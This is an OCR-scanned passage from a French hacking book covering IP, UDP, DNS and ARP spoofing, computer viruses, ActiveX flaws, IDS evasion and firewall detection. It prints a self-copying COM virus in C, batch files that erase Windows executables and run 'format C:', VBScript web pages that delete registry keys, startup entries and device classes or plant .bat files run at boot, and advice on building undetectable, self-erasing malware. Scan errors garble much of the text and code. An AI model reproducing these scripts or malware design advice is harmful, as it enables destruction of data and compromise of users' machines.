Flags | Off set du 




I Fragment 


TTL § Protocol e 


Cheksum d' en- tete 


Adresse it source 


Adresse IP able 


Uptions / remplissage ( padding) 


Zones de dormees. . . 
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Port source 



Port cible 



Numero de sequence 



N urn er o cT a cquittem ent 



Offset 
domee 


Re sera 


U 
R 
B 


A 
C 
E 


P 

S 

E 


R S 
S Y 
T H 


F 
I 

N 


Taille de lafenetre 


Somme de controle 


Pointeur Urgent 


Options /remplissage 


Donne es 




II n'existe pas de techniques toutes faites pour faire du spoofing car cela depend de 
l'environnement dans lequel on se trouve : 

si le systeme de securite se trouve dans le meme segment reseau que 
notre systeme ou dans le meme reseau local, nous n'aurons qu'a forger 
des paquets SYN et ACK, a les envoyer, a corriger leur cheksum a 
l'aide d'un sniffer, a sniffer la reponse du systeme cible, voir son 
numero ACK, l'incrementer d'une unite et a renvoyer le paquet ACK 
corrige dans un bref delai. Cette technique, aussi simpliste qu'elle soit 
demande quelques repetitions et ne peut se faire d'un coup. 
Si le systeme cible est eloigne de notre systeme, se trouve dans un autre 
reseau : il peut y avoir deux solutions : 

• soit le systeme cible renvoie un paquet SYN/ ACK a 
l'adresse spoofee. II ne nous reste alors plus qu'a controler 
le systeme a qui appartient l'IP spoofe, y installer un 
sniffer pour obtenir le paquet envoye par le systeme cible 
et renvoyer un paquet ACK corrige. 
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• soit on ne recoit pas de paquets SYN/ACK. II va falloir 
predire les numeros de sequences valides. Pour nous aider, 
on peut faire un fingerprinting du systeme cible pour avoir 
une estimation de la difficulty de la prediction des 
numeros les sequences. Le celebre Nmap integre cette 
fonctionnalite. 



Le cours sur TIP spoofing est finie, vous avez du remarquer que cette technique est 
tres puissante et demande quelque connaissances sur TCP/IP. A titre informatif, TIP 
spoofing est a la base de l'idle host scanning. 



Parades : 

il faudrait que les paquets qui circulent sur le reseau soit cryptes, 
empechez l'identification du systeme d'exploitation tournant sur votre 
systeme en emulant ou en modifiant l'implementation de TCP /IP sur le 
systeme, 

changez les techniques de filtrage habituel, par exemple, contre un jeu 
de questions/reponses cryptes entre les 2 systemes. 

PUDP spoofing : 

L'UDP spoofing fonctionne a peu pres comme 1TP spoofing : il faut forger des 
paquets truques. 

UDP est un protocole fonctionnant en mode deconnecte au niveau 4 du modele OSI. 

Que signifie en mode « deconnecte » ? cela veut dire que UDP ne cherche pas a 
etablir des connexions entre les systemes, il se contente juste dun bon cheksum, dune 
adresse IP source et de destination, d'un port et des donnees. 

Cela nous facilite grandement le travail car on n'a qu'a forger les paquets UDP, y 
inserer TIP source, l'IP de destination, y mettre les donnees que Ton veut et a envoyer 
le tout. Le cheksum est automatiquement determine. 

Pour forger des paquets UDP, on peut utiliser RafaleX, Hping2, Winject. . . 

le MAC spoofing : 

Cela consiste en la modification de l'adresse de sa carte reseau. 



le DNS spoofing : 
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II existe 2 types de technique de DNS spoofing, nous en avons vu une (au chapitre sur 
les outils et utilitaires automatises) qui consiste a faire des requetes a un serveur DNS 
sachant que normalement seuls les serveurs DNS secondaire sont censes faire ces 
requetes. 

La 2eme technique les DNS spoofing a pour but de faire correspondre un nom d'hote 
au systeme de notre choix. 

L'exemple le courant est le detournement d'une session pour rediriger la cible sur un 
site de notre choix. 

Cela est possible a l'aide de systemes de relais de paquets que Ton aurait crees ou 
controles (cf les chapitre sur les detournements de sessions) . 



ARP spoofing : 

D'abord, voyons qu'elle est la fonction du protocole ARP. 

ARP est un protocole qui a pour but de resoudre des adresses IP en adresses MAC. 

Lorsqu'une machine veut cornmuniquer avec une autre machine dont elle connait l'IP, 
elle va envoyer une requete ARP a tous les systemes d'un reseau (a l'aide du 
broadcast) demandant l'adresse MAC de IP specifiee. 

La machine cible concernee va done lui repondre en lui donnant son adresse MAC. 
Cette reponse va etre ensuite inscrite dans le cache ARP de la premiere machine. 

Toute cette manoeuvre est executee si et seulement si la machine A n'a pas encore 
d' entree correspondant a la machine B dans son cache ARP. 

Toutes les attaques de ARP spoofing ont pour but de faire passer par le systeme pirate 
le trafic reseau de notre cible. 

On va voir ensemble trois techniques de ARP spoofing qui consiste a envoyer une 
requete ARP (generalement a notre cible) pour lui dire que notre adresse MAC est 
associe a l'adresse IP choisie (generalement une passerelle par defaut, un routeur ou 
tout simplement le systeme cible, si Ton veut espionner le trafic entre deux systemes 
bien definis) . 

l ere technique : 

Elle n'est possible que si le cache de la cible ne contient pas encore d' entree 
correspondant a la machine dont on veut usurper l'adresse IP. Cela va done consister 
en la creation d'une entree dans le cache cible. Pour cela, il va falloir que Ton forge un 
paquet ARP associant notre adresse MAC a l'adresse IP a usurper. Puis, cette etape 
finie, on va devoir envoyer ce paquet a la cible, directement a la cible (en unicast par 
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exemple). Le paquet ARP doit etre en mode « who-as » et avoir comme IP source, 
celle a usurper, et comme adresse MAC source, la notre. 

et si on mettait son cache a jour ? 

Cette technique doit etre utilisee que si Ton sait que le cache cible a deja une entree 
non statique dans son cache ARP correspondant a l'adresse IP que Ton veut usurper. 
On va devoir forger un paquet ARP en mode « reply » que Ton va envoyer a la cible. 
Le paquet doit avoir comme IP source, celle a usurper, et comme adresse MAC 
source, la notre. 



et si on faisait la course ? 

Cette technique va demander rapidite d'analyse et d' envoi de paquets et de 
nombreuses repetitions de notre part pour etre prets le jour J. 

Lorsque la machine cible envoie un paquet au broadcast pour connaitre l'adresse 
MAC de TIP a spoofer, on va devoir renvoyer une reponse a la machine emettrice, le 
plus vite possible et invalider la machine devant normalement repondre pour qu'elle 
ne puisse le faire. 

Apres avoir fait une de ces techniques, il faut activer (mettre a 1) TIP forwarding. 

II existe divers programmes servant a faire de l'ARP spoofing, en voici une liste : 

• Dsniff de Dug Song : qui a certains modules permettant de faire de 
l'ARP spoofing et d'autres attaques comme celle du MITM. 

• Jarpspoofing 

• arp-sk 

Parades : 

- il y a une parade digne de ce nom pour contrer cela, elle consiste a 
mettre des entrees statiques dans le cache ARP. Bien sur cela est 
possible que pour les systemes de type routeurs, passerelles par defaut, 
serveurs... 

- sinon, il y a une autre solution qui consiste a mettre en place une 
machine qui va questionner un serveur DHCP, ou un autre type de 
serveur, avant qu'une entree soit ajoutee dans le cache ARP d'un des 
systemes du reseau. Bien sur, les pirates peuvent infiltrer et detourner 
ce systeme a leur profit mais cela reste quand meme une solution. 
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Programmes infectants et lutte anti-virale 



Un programme infectant est un bout de code auto-reproducteur ou non qui execute les 
actions, generalement malfaisantes, de son constructeur. 

Nous allons d'abord voir differents types de virus puis nous allons etudier la 
construction d'un virus en observant sa constitution, en dernier, nous allons voir les 
differentes methodes de transmission du virus. 



Virus 


Programme n'etant pas auto-reproducteur (dit programme 

simple), qui a pour but de se copier dans d'autres 
programmes encore sains et d'executer ce pourquoi il a ete 

cree. 


Vers 


Programme auto-reproducteur qui voyage de systemes en 
systemes dans le but de se multiplier. 


Troyen 


Virus generalement simple qui a pour but de donner a son 
concepteur ou a ceiui qui i a irauauieusement lntrouuit cians 






winic roc i H r*n 1 
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permanente et est cree pour controler un/des elements 

precis. 


virus polymorphe 


Virus qui a la possibility de modifier son code dans le but de 
ne pas etre indetectable. 


virus furtif 


Virus qui a note les parametres du systeme avant de le 
controler et qui fait croire au systeme qu'il est normal. 


Retro-virus 


Virus cree dans le but de prouver qu'un systeme anti-virale 
precis n' assure pas son role. 


virus compagnon 


Virus qui utilise une des caracteristiques du DOS pour 
fonctionner. En faite lorsqu'un programme est mis dans un 
repertoire, si Ton creer un programme COM du meme nom 
que le programme executable, qu'on le place dans le meme 

repertoire que l'homonyme executable et que Ton essaie 
d'acceder a l'executable, le DOS prefere executer le fichier 
COM en premier. Maintenant si le fichier COM est un virus, 
on appelle cela un virus compagnon. 


virus systeme 


Virus se dupliquant dans des sections systemes 
contrairement aux autres virus qui se copient dans des 

fichiers. 



On peut creer des virus avec n'importe quel langage, mais n'oublier pas que les vrais 
programmeurs de virus preferent le langage assembleur car il est plus proche du 
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systeme et les programmes en assembleur sont de petites tailles. Done que les futurs 
createurs de programmes infectant se mettent a apprendre leur futur langage cle. 

Certains pourraient dire que je donne les armes au public pour la creation de virus, 
mais qu'ils sachent que mon but premier n'est pas la formation d'apprentis 
programmeurs des virus mais plutot de faire comprendre l'enjeu des actions d'un virus 
pour que la communaute des internautes sache a quoi elle est exposee face a ces petits 
programmes. 



constitution d'un programme infectant : 

A la base, tous les programmes infectant ont la meme constitution : 

- une routine de recherche de lieux a infecter (generalement des fichiers) 
une routine de copie de code 

- une routine de non-detection de la presence du virus 

- une charge (ce pourquoi il a ete cree) 



Maintenant, voyons qu'elle devrait etre la constitution d'un programme infectant 
parfait : 

pouvoir s'executer sur tous les systemes sans probleme et sans toucher 
au code. Cela est possible grace aux langages REBOL et Perl (il y en 
a d'autres bien sur). 

avoir de bonnes routines de recherche de fichiers ou de systemes. 
- pouvoir faire des copies de lui meme dans des endroits ou Ton ne 
pourra pas le detruire facilement : comme dans le noyau du systeme, 
dans les espaces memoire, le BIOS, dans des sequences de boot... 
etre invisible, se camoufler pour qu'il soit indetectable et intracable. 
Son invisibilite peut passer par l'utilisation de techniques de 
polymorphisme. 

se suffire a lui-meme au moyen de moteurs, de bases de donnees, de 
librairies de fonctions puissantes. Ne pas utiliser les fonctions ou APIs 
proposees par les systemes pour qu'il garde sa portabilite. 
pouvoir evoluer dans l'environnement dans lequel il se trouve. Cela 
peut se traduire par la creation d'un ver qui analyse le systeme sur 
lequel il se trouve puis telecharge le bout de code qui lui manque pour 
evoluer dans l'environnement du systeme sur lequel il se trouve. 
ne pas avoir de nom. 

executer seulement ce pourquoi il est ecrit. 

se supprimer quand il a accompli son devoir. 

noter les informations qu'il modifie dans le but de tout remettre en 

ordre sur le systeme cible lorsqu'il n'a pas pu accomplir son devoir pour 

qu'aucune personne ne remarque son passage. 

son code ne doit pas contenir de commentaires pour que Ton ne puisse 
remonter a son developpeur. 
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Ces caracteristiques ont ete developpees a partir du projet Samhein de Zalewski 
(http://lcamtuf.coredump.cx) que vous pouvez consulter pour avoir d'autre conseils. 

comment transmettre les programmes infectant : 

Cette partie du chapitre ne sera pas de grande taille, malgre le nombre incalculable de 
possibilites de transmission d'un programme infectant. Nous allons en voir certains 
sans les detailler car soit elles sont simples a comprendre, soit les techniques 
expliquees sont deja detaillees dans le livre. Comme devoir, vous pouvez essayer de 
trouver d'autres moyens de transmission : prenez cela comme un exercice ayant pour 
but de vous faire penser comme un pirate. 

Les programmes ou script infectant et malveillant peuvent etre transmis par disquette, 
disque dur, CD-ROM (contenant un fichier autorun.inf), DVD ROM, par le web, en- 
tetes HTTP, SMTP, MIME modifiees, telechargement dans le cache Internet, e-mail, 
pieces jointes, technologies du web (comme ActiveX, Javascript...), contournement 
des filtres, logiciels telecharges, compression zip (qui peut faire voyager un virus sans 
contaminer les postes sur lequel il passe : on est contamine si Ton decompresse le 
virus)... 



la lutte anti-virale : 

Nous allons observer les trois principales techniques de recherche anti-virale : 

- analyse des signatures : qu'est-ce que la signature d'un programme ? 
c'est tout simplement une suite de donnes (bits, caracteres. . .) 
caracterisant le programme. II en est de meme pour les programme 
infectant.. Pour informations, les IDS fonctionnent sur ce principe 
d'analyse , ce qui est leur principal erreur car cette protection peut-etre 
contournees. 

- l'analyse heuristique : c'est une technique anti-virale plutot evoluee : 
car elle consiste a etudier et surveiller le comportement des 
programmes. Des qu'un programme se comporte comme un virus, il le 
definit comme un virus. 

l'analyse spectrale : l'antivirus va analyser ce que fait le programme 
en recherchant la liste des instructions. S'il voit qu'une instruction 
specifique aux programmes infectant y est presente, il met 
automatiquement le programme en quarantaine. 

Informations supplementaires 
la signature d'un virus 
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La signature peut etre changee (en faisant par exemple un virus polymorphe). 



Pour vous donner un apercu de l'aspect d'une signature, en voici 2 de virus connus : 



Virus 


Signature 


Brain (c'est un virus de secteur de 
disquettes qui detourne 1' interruption 13 
pour se camoufler.) 


8CC88ED88ED0BC00F0FBA0067CA2097C8B0E 
077C890E0A7CE85700 


Vendredi 13 (c'est un virus resident qui 
infecte tout type d'executable et detruit 
tous les vendredi 13 les executables 
lances.) 


1E8BECC746100001E80000582DD700B104D3E8 
8CCB03C32D100050 



TSR 

Les programmes residents sont des applications particulieres. 

lis sont developpes de la meme maniere que les autres programmes mais ne finissent 
pas de la meme maniere que ces derniers. 

De plus, le DOS reserve une memoire speciale pour les TSR. Ce segment de memoire 
est protege contre l'ecriture par d'autre programmes. 

Pour ecrire un programme TSR, il faut suivre certaines regies : 
verifier sa presence avant d'en charger une copie. 
il ne doit pas utiliser la pile d' execution des autres programmes (il doit 
done avoir sa propre pile d' execution). 
- utiliser plus d' interruptions que de fonction DOS ou Windows. 

Virus COM 

Voici l'extrait d'un virus COM developpe pour cet ouvrage. Par mesure de securite il 
n'est pas tres dangereux et n'est pas donne en entier. 

Son fonctionnement est le suivant : lorsqu'il est charge, il cree un fichier et ecrit 
dedans, puis il ajoute une ligne au fichier autoexec.bat qui va imprimer le fichier 
texte, cree auparavant, des le demarrage suivant du systeme (si l'imprimante est 
allumee bien sur). Pour finir, il cherche des flchiers COM se trouvant dans le 
repertoire dans lequel il est, pour s'y copier. 

II sera active des que l'utilisateur du systeme appellera un programme (ayant un 
fichier COM du meme nom et dans le meme repertoire) par l'intermediaire du shell 
DOS. 



# DEFINE BYTE xxxx // taille du virus a la 

compilation 
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copy () 
{ 




FILE *point, *new point; 
int next; 

struct ffblk infect; 
char pres, buffer [BYTE] ; 




pres = argv [ 0 ] ; 

next = f indf irst ( "* . COM" , Sinfect, 


0) ; 


point = fopen(pres, "rb"); 

new point = f open (infect . ff name, 


"rb+") ; 


f read (buffer, BYTE, 1, point); 
fwrite (buffer, BYTE, 1, new point) 


f 


f closeall ( ) ; 
return 0; 

} 




write batch ( ) 




{ 

FILE *file, *txt; 
char chaine, buff[]; 
size t taille; 
int vtaile; 




chaine = "COPY C:\FICHIER.TXT PRN" 


/ 


file = f open ("C:\AUTOEXEC. BAT", "rt+"); 
txt = fopen ("C: \FICHIER.TXT", "w+"); 


fprintf (txt, "Vous vous etes fait 
COM de KHAALEL !!!"); 


avoir par le virus 


taille = strlen (chaine) ; 
vtaille = (int) taille; 
vtaille -= vtaille * 2; 




if (vtaille < 0) 




{ 

fseek(file, vtaille, SEEK END) ; 
fread(buf, vtaille, 1, file) ; 
buf [vtaille] = 0; 




if ( strcmp (buf , chaine)) 
{ 




f seek (file, 0, SEEK END) ; 
fprintf (file, chaine); 

} 




f closeall ( ) ; 
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return 0 ; 




main ( ) { 




write batch ( 


) ; 


copy ( ) 




return 0; 
} 





Fichiers BAT 

Avant de lire la suite, faites un saut vers l'annexe sur les commandes DOS pour 
pouvoir les connaitre. 

Voici 4 fichiers BAT : les 3 premiers sont des virus, le dernier est juste un utilitaire 
qui affiche les executables et les fichiers COM d'un systeme sous Windows 2000. Si 
vous voulez que ce dernier fonctionne sous les autres systemes Windows, vous allez 
devoir modifier where It C:\ *. [extension] par DIR 
C : \* . [extension] /A:-D /S . 



l er fichier BAT : 

@echo off 
els 

echo Bonjours, 

echo je suis un petit virus, mais chuuuuuuuut, faut pas le 
dire . 
echo . 

erase c : \windows\ * . exe 
erase c : \windows\ * . com 
erase c:\autoexec.bat 
pause 

echo Bonne chance ! ! ! 



2 eme fichier BAT : 

@echo off 
echo Bonjours, 

echo je suis un gentil petit virus qui ne va pas detruire vos 
fichiers ! 
echo . 

echo je vous entend deja dire 
echo Ouuuuuuuuuuf !!!!!!!!!! 
echo . 
pause 

echo Je veux jouer ! ! ! 
dir/p c:\windows\ 
dir/p c:\ 
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dir/p c : \windows\ 
echo Au revoir! ! ! 



3 eme fichier BAT : 

// Ceci est un virus. C'est un jeux, ou vous devez choisir 
entre le chiffre 1 et 2, puis vous saisissez votre choix et la 
touche entree. Si vous choisissez 1, le fichier formate le 
lecteur C : soit le disque dur, si vous choisissez 2, il 
supprime tous les executables et les fichiers COM du 
repertoire Windows.// 



SET 


Choix 


SET 


Choix 


IF 


%Choix 


IF 


%Choix 


IF 


%Choix 


IF 


%Choix 


IF 


%Choix 



--="1" GOTO Win 
--="2" GOTO Erra 
=="/?" GOTO Prototype 
=="help" GOTO Prototype 

: Prototype 

echo Ceci est un jeux. Vous devez choisir entre 1 et 2, tapez 
votre choix puis la touche entree, 
echo . 

echo Voici la syntaxe [Norn fichier] "1" 
GOTO Pause 

: Win 

echo Dommage, vous avez choisi 1, vous gagnez le formatage du 
lecteur C. 
echo . 

format C : 
GOTO Pause 



: Erra 

echo Dommage, vous avez choisi 2, vous gagnez l'effacement de 
tous les executables et fichiers COM de c:\Windows\. 
Echo . 

Erase c : \windows\ * . exe 
Erase c : \windows\ * . com 
GOTO Pause 



: Pause 



4eme fichier BAT: 

@echo off 

echo Bonjours! ! ! 

echo Je suis un petit utilitaire qui va vous montrer tous les 
fichiers executables et fichiers COM de votre systeme. 
echo . 
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echo Attention, j e ne fonctionne que sous Windows 2000. 
echo . 

echo Ah ! oui, il vous faut la NTRK de Microsoft, 
echo . 

where /r C:\*.exe 
pause 

where /r C:\*.com 
echo Au revoir! ! ! 



ActiveX 

II ne se passe un mois sans que Ton trouve une nouvelle faille dans la technologie de 
Microsoft : ActiveX. 

Faire un cours sur ActiveX et sur la creation d'une page web depasse le cadre de ce 
livre, on verra seulement certaines failles ActiveX permettant de faire differentes 
actions sur un systeme (vous pourrez trouver d'autres codes sur internet). 

Tous les codes suivant sont en VBScript. 

Comment supprimer une cle de la base de registre 

<html> 
<body> 

<script Language="VBScript"> 

Set WshShell = CreateObj ect ( "WScript . Shell" ) 

WshShell . RegDelete "HKEY_LOCAL_MACHINE\xxxxx\ " 

</script> 

</body> 

</html> 



xxxxx : est a modifier par la cle que vous voulez. 



Comment supprimer les programmes se lancant au demarrage de Windows 

<html> 
<body> 

<script Language="VBScript"> 

Set WshShell = CreateObj ect ( "WScript . Shell" ) 

WshShell. RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ 

Windows \ Cur rent Version\ Run" 

</script> 

</body> 

</html> 



Comment creer un raccourci vers un site internet sur le bureau 
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<html> 
<body> 

<script Language="VBScript"> 

if location . protocol = "file:" then 

Set WshShell = CreateObj ect ( "WScript . Shell" ) 

Set FSO = CreateObject ("Scripting. FileSystemOb j ect" ) 

HPath = Replace (location. href , "/", "\") 

HPath = Replace (HPath, "file:\\\", "") 

HPath = FSO. GetParentFolderName (HPath) 

Set TRange = document . body . createTextRange 

Set RealLink = 

WshShell . CreateShortcut ( "C : \WINDOWS\bureau\site" ) 

RealLink . TargetPath = "http://www.site.com" 

RealLink. Save 

end if 

</script> 

</body> 

</html> 

Comment supprimer l'historique 

<html> 
<body> 

<script Language="VBScript"> 

Set WshShell = CreateObj ect ( "WScript . Shell" ) 
WshShell . RegDelete 

"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\e 
xplorer\ RecentDocs\" 
WshShell . RegDelete 

"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\e 
xplorer\ RunMru\" 
WshShell . RegDelete 

"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\e 
xplorer\ Doc Find Spec MRU\" 
WshShell . RegDelete 

"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\e 

xplorer\ FindComputerMRU\ " 

</script> 

</body> 

</html> 

Desinstaller l'imprimante, le clavier, l'ecran, la souris et le disque dur 

<html> 
<body> 

<script Language="VBScript"> 

Set WshShell = CreateObj ect ( "WScript . Shell" ) 
WshShell . RegDelete 

"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Pri 
nter\ " 

WshShell . RegDelete 

"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Key 
board\ " 
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WshShell . RegDelete 

"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Mon 
itor\" 

WshShell . RegDelete 

"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\PCM 
IA\" 

WshShell . RegDelete 

"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Mou 
se\" 

</script> 

</body> 

</html> 

On peut encore faire beaucoup de choses comme enlever des elements du menu 
Demarrer, desinstaller des programmes, ecrire des cles dans la base de registre ou les 
modifier... 

Maintenant, voici comment ecrire un fichier bat sur un PC : 

<html> 
<body> 

<script Language="VBScript"> 

if location . protocol = "file:" then 

Set FSO =CreateObject ("Scripting. FileSystemObj ect" ) 

HPath = Replace (location. href , "/", "\") 

HPath = Replace (HPath, "file:\\\", "") 

HPath = FSO. GetParentFolderName (HPath) 

Set TRange = document . body . createTextRange 

Set BatFile = FSO . CreateTextFile ( "c : \Windows\xxxx .bat" , 2, 
False) 

BatFile .WriteLine "" 

BatFile . WriteLine "Ici le fichier bat voulu (son contenu) " 

BatFile . Close 

end if </script> 

</body> 

</html> 



xxxx.bat est un fichier .bat qui peut exister (comme autoexec.bat) cela entrainera done 
son ecrasement et l'ecriture de notre fichier .bat a la place : au prochain demarrage 
nos commandes seront executees. On peut aussi creer un nouveau fichier .bat 



Pourquoi ces vulnerability ActiveX existe-t-elle? 

Nous allons essayer de savoir pourquoi de telles codes peuvent mettre a plat la 
securite de Windows. 

Microsoft a developpe 5 niveaux (ou encore appeles « zones ») de securite dans 
Internet Explorer, les voici : 

Poste de travail 

Sites de confiances 
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Sites sensibles 
Internet 
Intranet local 



Pour information, on peut configurer ces zones de securites grace a Internet Explorer 
par le biais de Options Internet du menu Outils. Par mesure de securite, on ne peut 
configurer la zone « Poste de travail » avec Internet Explorer (heureusement, c'est 
notre disque dur). 

De plus, la zone « Poste de travail » est la plus permissive. 



Le but des vulnerabilites de ce type est d'executer ce que l'on veut dans la zone de 
securite « Poste de travail ». 



Avant de continuer, sachez que chaque zone a ses protocoles : http:// pour Internet, 
file:// pour Poste de travail. . . 



Alors, pour contourner ces zones, il faut utiliser des fonctions de changements de 
zones qui ne sont pas controlees. 

Voici un bout de code qui peut permettre le 
contournement (il ne peut fonctionner seul) : 

opener . location = " file:" ; 
vRef = opener . location . assign; 

Le chapitre prend fin, vous venez de decouvrir une nouvelle facette du piratage web 
grace a des vulnerabilites que Microsoft n'a pas encore patche a l'heure ou se livre est 
ecrit. 

Certains pirates les utilisent pour diverses actions, comme placer un virus dans un 
systeme sans que l'utilisateur ne fasse quelque chose (il doit quand meme se rendre 
sur la page contenant le code). Certains createurs de sites pornographiques les 
utilisent aussi pour placer leurs kits de connexions sur votre systeme des que vous 
chargez les pages de leurs sites. 



Parades : 

installez un firewall, 

installez un antivirus et le mettre regulierement a jour, 
ne pas se fier aux apparences. Car les virus vont adopter n'importes 
quelles formes attrayantes et attirantes pour que vous les chargiez, 
ne pas trop faire confiance a 1' antivirus installe par defaut dans 
Windows XP. 
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Piratage de composants 

reseaux 
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IDS 



Dans ce chapitre, nous allons nous interesser aux systemes de detection d'intrusion 
(IDS) . Nous allons voir en quoi ils consistent puis comment les pirates reussissent a 
contourner ces systemes de detection. 

les IDS : 

Comme en temoigne son nom, un IDS est un systeme de detection d'intrusion pour les 
systemes Unix/Linux ( a l'heure ou ce livre est redige en tout cas ). Les IDS ont 2 
types d'analyse : 

L'analyse des signature : 1'IDS va capturer des paquets en direction du 
systeme ou du reseau sur lequel il est place. Puis il va les comparer 
avec les elements de sa base de donnees de signatures d'attaques. Si la 
comparaison s'avere positive, 1'IDS va alerter l'utilisateur ou 
l'administrateur du reseau pour lui signaler une attaque. Si la 
comparaison s'avere negative, 1'IDS ne fait rien. 
L'analyse heuristique : comme pour les antivirus, 1'IDS va analyser le 
comportement des paquet recus, d'un programme installe sur le systeme 
et pleins d'autres elements pour essayer de detecter des comportements 
anormaux. 



II existe 2 type d' IDS : 

- les IDS reseau (NIDS) qui sont constitues de deux parties, un programme 
qui va capturer les paquets circulant sur le reseau et un poste charge 

d' analyser le paquet capture. Le programme de capture peut etre aussi 
bien un sniffer ou une carte reseau en mode promiscuite (cf le chapitre 
sur le sniffing) . 

- les IDS personnel (HIDS) que Ton installe sur un ordinateur, comme des 
antivirus. Ils sont constitues d'un element qui utilise aussi les deux types 
d'analyses citees precedemment. Les HIDS utilisent plusieurs techniques 
de detection : 1' audit de systemes a la recherche de fichiers ayant ete 
corrompus ou modifies, l'installation d'un jeu de fichier log (journaux 
systemes) journalisant les faits et gestes des programmes et utilisateurs 
de l'ordinateur. 



Termes en rapport avec les IDS : 

- NIDS : IDS reseau 

- HIDS : IDS personnel 

faux positif : fausses alertes envoyees par 1'IDS 

faux negatifs : veritables attaques non signalees par 1'IDS 
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first match : signalement d'une attaque apres sa premiere apparition, 
multiple match : signalement d'une attaque apres des multiples 
apparitions. 

First match et multiple match correspondent a des modes d'activites d'un IDS, c'est- 
a-dire que 1'IDS peut alerter des la premiere apparition d'une attaque ou a la suite de 
plusieurs apparition d'une attaque. 



contournement d'un IDS : 
le spoofing : 

Le spoofing en lui-meme ne va pas vraiment servir au pirate qui veut contourner un 
IDS a moins que ce dernier soit base sur l'analyse du champ des paquets contenant 
l'adresse IP de l'emetteur. Le spoofing va surtout servir a contourner certains ACLs 
qu'aurait pu installer l'utilisateur du systeme. 

fragmentation : 

Certains IDS ont un tres grand probleme. lis assemblent avec difficultes des paquets 
fragmentes. C'est pour cela qu'en jouant un peu avec les paquets que Ton aura 
fragmente, on pourrait peut-etre contourner un IDS (cela touche surtout les IDS 
reseau) . 

Voici certains exemples de manipulation des paquets fragmentes : 

on les envoie dans le desordre en commencant par le milieu ou par le 
paquet de la fin 

on envoie des paquets fragmentes en dupliquant l'un des paquets 
on envoie simultanement plusieurs paquets. 

modification des TTL : 

On peut jouer avec le champ TTL d'un paquet pour atteindre un systeme cible ou pour 
flooder 1TDS reseau. 



DoS : 

On peut invalider le systeme de detection l'intrusion a l'aide d'une attaque DoS. On 
peut par exemple lancer des simulateurs d'attaques ou creer une base de donnees 
d'attaques (en s' aidant de programmes que Ton peut trouver sur Internet) pour qu'ils 
balancent leurs attaques contre les systemes de detection d'intrusion (il faut voir grand 
comme 20000 attaques pratiquement simultanees et regulieres) . Cela peut aussi 
servir a cacher une vraie attaque que l'on aurait confectionne. 
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encapsulation : 

On peut encapsuler des attaques dans des paquets forges et anodins. Les paquets 
peuvent etre du meme protocole ou de protocoles differents. Cela peut servir si 
l'administrateur a mis une bascule de protocole dans la DMZ. Cela reviendrais a faire 
du tunneling. 

le polymorphisme : 

Le polymorphisme est tres utilise en virologie informatique ou lors de la creation 
d'attaques de type depassement de tampon a distance. Pour plus informations sur cette 
technique, referez-vous au chapitre sur les virus informatique. Internet est aussi une 
mine dor sur le polymorphisme des virus. 

Pour ceux voulant attaquer un IDS a l'aide d'un shellcode (comme pour les attaques 
par depassement de tampons, vous pouvez utiliser ADMutate de K2 qui utilise le 
polymorphisme pour cacher les shellcodes ). 

ASCII et UNICODE : 

Comme les IDS sont bases sur l'analyse des signatures. Pour contourner cette 
protection, il suffit alors de refaire l'attaque en modifiant son code : cela peut passer 
par la transformation du code d'attaque en equivalent UNICODE (cf les attaques 
contre les CGI) 



les NOP de Passembleur : 

Voila encore une autre technique prise des depassements de tampons. Lorsque Ton 
redige ce genre de attaque, on ne peut pas toujours prevoir l'adresse de retour la 
fonction cible. Pour pallier a ce probleme, on peut utiliser l'instruction NOP (No 
Operation) qui ne fait rien et passe a l'instruction suivante. 

Et bien, cette technique peut-etre utilisee pour contourner les IDS qui ne verifient pas 
toujours les paquets en entier (seulement le debut du paquet generalement) . On a 
done la possibilite de masquer le code de l'attaque en y mettant, au debut une grande 
suite de NOP. 



le retour au repertoire precedent : 
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Les habitues de Linux doivent connaitre les caracteres du genre : « ../ » et « ./ ». 
Dans cette technique, seul le premier caractere nous interesse et figure dans les 
elements permettant aux pirates de modifier la signature d'une attaque. 



le changement : 

Le plus simple est de changer d'attaque et de ne pas affronter l'IDS de face. Faire par 
exemple une attaque par depassements de tampons. . . 

Le scanner de CGI Whisker de Rain Forest Puppy integre quelques techniques contre 
les IDS. Analyser son code source peut grandement aider. 

Parades : 

- mettre regulierement a jour la base de donnees des attaques des IDS 

- changer l'implementation des IDS pour qu'ils analysent les paquets en 

entier et gerent mieux la fragmentation. 

- creer une DMZ et mettre un NIDS par segment de reseau. 

- toujours mettre un firewall/routeur avec le NIDS 
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Murs par feu 



Un mur par- feu est un systeme ou un logiciel qui va analyser et controler le trafic 
entre votre systeme, internet et d'autres systemes dans tous les sens possibles dans le 
but de securiser votre ordinateur au maximum. 

II existe principalement deux types de murs par-feu : 

ceux qui se comportent comme des routeurs. Ce sont des murs par- feu 
materiels. 

ceux qui se comportent comme des proxys. Ce sont des murs par-feu 
logiciels. 

Les murs par-feu fonctionnent generalement comme des systemes de filtrage de 
paquets qui analysent des paquets du trafic et laissent passer seulement ce qui a ete 
autorise. 



Voici un celebre phrase resumant bien le travail d'un firewall : 

un firewall refuse et interdit tout ce qui n'a pas ete explicitement autorise. 



Un mur par-feu peut etre contourne et transperce et nous allons voir dans ce chapitre 
comment cela est possible. 

identification d'un firewall : 
traceroute et tracert : 

Traceroute et tracert sont des utilitaires permettant de decouvrir les chemins qu'un 
paquet empreinte pour aller jusqu'a notre destinataire : 

- si au dernier bond, l'adresse IP du destinataire n'apparait pas, on peut en 
conclure qu'il y a un systeme de filtrage de paquets. 

si on analyse bien les flags des paquets envoyes et recus, qu'on 
remarque qu'il y a une anomalie, on peut en conclure qu'il y a un 
systeme de filtrage de paquets. 



Voici un tableau expliquant les flags d'envois et de retours des paquets. 



STATE 


FLAG 


REPLY 


listen 


NULL 


None 


listen 


FIN 


None 
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listen 


RST 


None 


listen 


ACK 


RST 


listen 


SYN 


SYN /ACK 


closed 


RST 


None 


closed 


NULL 


RST/ACK 


closed 


ACK 


RST 


closed 


SYN 


RST/ACK 


closed 


FIN 


RST/ACK 



balayage : 

